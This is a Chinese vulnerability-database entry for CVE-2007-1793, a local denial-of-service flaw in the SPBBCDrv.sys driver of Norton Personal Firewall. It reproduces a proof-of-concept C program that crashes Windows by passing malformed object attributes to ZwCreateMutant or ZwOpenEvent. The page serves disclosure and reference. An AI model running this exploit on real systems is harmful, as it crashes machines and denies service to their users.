Symantec Norton个人防火墙SPBBCDrv驱动本地拒绝服务漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1112595 漏洞类型 输入验证
发布时间 2007-04-01 更新时间 2008-12-11
CVE编号 CVE-2007-1793 CNNVD-ID CNNVD-200704-033
漏洞平台 Windows CVSS评分 4.9
|漏洞来源
https://www.exploit-db.com/exploits/29810
https://www.securityfocus.com/bid/23241
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200704-033
|漏洞详情
SymantecNorton个人防火墙是非常流行的防火墙软件。Norton个人防火墙的驱动实现上存在漏洞,本地攻击者可能利用此漏洞对系统执行拒绝服务攻击。Norton的SPBBCDrv.sys驱动没有正确验证某些钩子函数的参数,如果使用特制参数调用了NtCreateMutant或NtOpenEvent的话,就可能导致系统崩溃。
|漏洞EXP
source: http://www.securityfocus.com/bid/23241/info

Multiple Symantec products are prone to a local denial-of-service vulnerability.

This issue occurs when attackers supply invalid argument values to the 'SPBBCDrv.sys' driver.

A local attacker may exploit this issue to crash affected computers, denying service to legitimate users. 

/*

 Testing program for Multiple insufficient argument validation of hooked SSDT function (BTP00000P002NF)
 

 Usage:
 prog FUNCNAME
   FUNCNAME - name of function to be checked

 Description:
 This program calls given function with parameters that cause the crash of the system. This happens because of 
 insufficient check of function arguments in the driver of the firewall.

 Test:
 Running the testing program with the name of function from the list of functions with insufficient check
 of arguments.

*/

#undef __STRICT_ANSI__
#include <stdio.h>
#include <string.h>
#include <windows.h>
#include <ddk/ntapi.h>
#include <ddk/ntifs.h>

void about(void)
{
  printf("Testing program for Multiple insufficient argument validation of hooked SSDT function (BTP00000P002NF)\n");
  printf("Windows Personal Firewall analysis project\n");
  printf("Copyright 2007 by Matousec - Transparent security\n");
  printf("http://www.matousec.com/""\n\n");
  return;
}

void usage(void)
{
  printf("Usage: test FUNCNAME\n"
         "  FUNCNAME - name of function to be checked\n");
  return;
}


int main(int argc,char **argv)
{
  about();

  if (argc!=2)
  {
    usage();
    return 1;
  }

  if (!stricmp(argv[1],"NtCreateMutant") || !stricmp(argv[1],"ZwCreateMutant"))
  {
    HANDLE handle;
    OBJECT_ATTRIBUTES oa;
    InitializeObjectAttributes(&oa,(PVOID)1,0,NULL,NULL);

    ZwCreateMutant(&handle,0,&oa,FALSE);

  } else if (!stricmp(argv[1],"NtOpenEvent") || !stricmp(argv[1],"ZwOpenEvent"))
  {
    HANDLE handle;
    OBJECT_ATTRIBUTES oa;
    InitializeObjectAttributes(&oa,(PVOID)1,0,NULL,NULL);

    ZwOpenEvent(&handle,0,&oa);
  } else printf("\nI do not know how to exploit the vulnerability using this function.\n");

  printf("\nTEST FAILED!\n");
  return 1;
}
|受影响的产品
Symantec Norton SystemWorks 2006 0 Symantec Norton SystemWorks 2005 Premier 0 Symantec Norton SystemWorks 2005 0 Symantec Norton SystemWorks 2004 Professional Edition Symantec Norton Sys
|参考资料

来源:SECTRACK
名称:1017838
链接:http://www.securitytracker.com/id?1017838
来源:SECTRACK
名称:1017837
链接:http://www.securitytracker.com/id?1017837
来源:VUPEN
名称:ADV-2007-1192
链接:http://www.frsirt.com/english/advisories/2007/1192
来源:XF
名称:symantec-firewall-ssdt-dos(33352)
链接:http://xforce.iss.net/xforce/xfdb/33352
来源:SECTRACK
名称:1021389
链接:http://www.securitytracker.com/id?1021389
来源:SECTRACK
名称:1021388
链接:http://www.securitytracker.com/id?1021388
来源:SECTRACK
名称:1021387
链接:http://www.securitytracker.com/id?1021387
来源:SECTRACK
名称:1021386
链接:http://www.securitytracker.com/id?1021386
来源:BID
名称:23241
链接:http://www.securityfocus.com/bid/23241
来源:BUGTRAQ
名称:20070918Plaguein(security)softwaredrivers&BSDOhookutility
链接:http://www.securityfocus.com/archive/1/archive/1/479830/100/0/threaded
来源:BUGTRAQ
名称:20070401NortonMultipleinsufficientargumentvalidationofhookedSSDTfunctionVulnerability
链接:http://www.securityfocus.com/archive/1/archive/1/464456/100/0/threaded
来源:MISC
链接:http://www.matousec.com/projects/win